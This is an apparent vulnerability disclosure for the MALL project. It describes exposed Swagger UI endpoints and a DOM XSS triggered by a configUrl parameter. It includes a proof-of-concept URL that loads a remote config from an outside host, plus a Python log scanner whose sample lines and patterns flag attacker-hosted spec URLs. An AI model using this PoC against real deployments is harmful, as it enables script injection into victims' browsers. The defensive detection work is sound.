A vulnerability report has already been submitted at https://github.com/macrozheng/mall/issues/919,
but it was deleted by the MALL maintainer.
Due to improper access control on the Swagger-related endpoints, an attacker can reach the internal API documentation, and one of those endpoints is affected by a DOM XSS vulnerability.
Swagger UI has an interesting feature that allows you to provide a URL to an API specification, a YAML or JSON file that will be fetched and displayed to the user. To do that you add the query parameter ?url=https://your_api_spec/spec.yaml or ?configUrl=https://your_api_spec/file.json.
The first obvious thing is that if we can bypass the HTML sanitizer, we get a really easy DOM XSS thanks to dangerouslySetInnerHTML: React will simply render ANY HTML and allow us to execute the JS payload.
IDOR:
http://127.0.0.1:7001/swagger-ui/
XSS
http://127.0.0.1:7001/swagger-ui/index.html?configUrl=https://jumpy-floor.surge.sh/test.json
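From the defender's side, the two conditions above are easy to spot in web-server access logs: any request to the Swagger paths on a production host is an exposure finding, and a request whose url or configUrl parameter points at a host you do not own is the remote-spec pattern used in the XSS PoC. The script below is an added example written for this page, not code from the MALL project or from the linked blog post; the log lines are constructed samples in combined log format, and the /swagger-ui, /swagger-resources and /v2, /v3 api-docs prefixes are assumed defaults for a Spring Boot application. Recent Swagger UI releases only honour these query parameters when the queryConfigEnabled option is set, so the fix is to keep that option off and to put the documentation endpoints behind authentication or remove them from production builds.

```python
"""Flag access-log entries that reach Swagger UI or feed it a remote spec/config URL."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /swagger-ui/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /swagger-ui/index.html?configUrl=https://attacker.example/test.json HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /swagger-ui/index.html?url=/v3/api-docs HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /product/list HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format request line parser.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed default documentation paths for a Spring Boot / springfox application.
SWAGGER_PREFIXES = ("/swagger-ui", "/swagger-resources", "/v2/api-docs", "/v3/api-docs")
# Query parameters Swagger UI accepts for a remote spec or config file.
SPEC_PARAMS = ("url", "configUrl")


def classify(line, own_hosts=frozenset()):
    """Return a finding dict for a Swagger-related request, or None otherwise.

    severity is "exposure" for any hit on a documentation path and
    "remote-spec" when url/configUrl names a host outside own_hosts.
    """
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith(SWAGGER_PREFIXES):
        return None
    finding = {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "path": parts.path,
        "status": int(m.group("status")),
        "severity": "exposure",
        "remote": None,
    }
    qs = parse_qs(parts.query)
    for param in SPEC_PARAMS:
        for value in qs.get(param, []):
            host = urlsplit(value).hostname  # None for relative paths such as /v3/api-docs
            if host and host not in own_hosts:
                finding["severity"] = "remote-spec"
                finding["remote"] = value
    return finding


def scan(log_text, own_hosts=frozenset()):
    """Classify every line of an access log and return the list of findings."""
    return [f for f in (classify(l, own_hosts) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:12} {f['ip']:10} {f['path']} remote={f['remote']}")
```

Pass the hostnames your deployment legitimately serves specs from in own_hosts so that an internal url=/v3/api-docs stays an exposure finding rather than a remote-spec alert.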
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/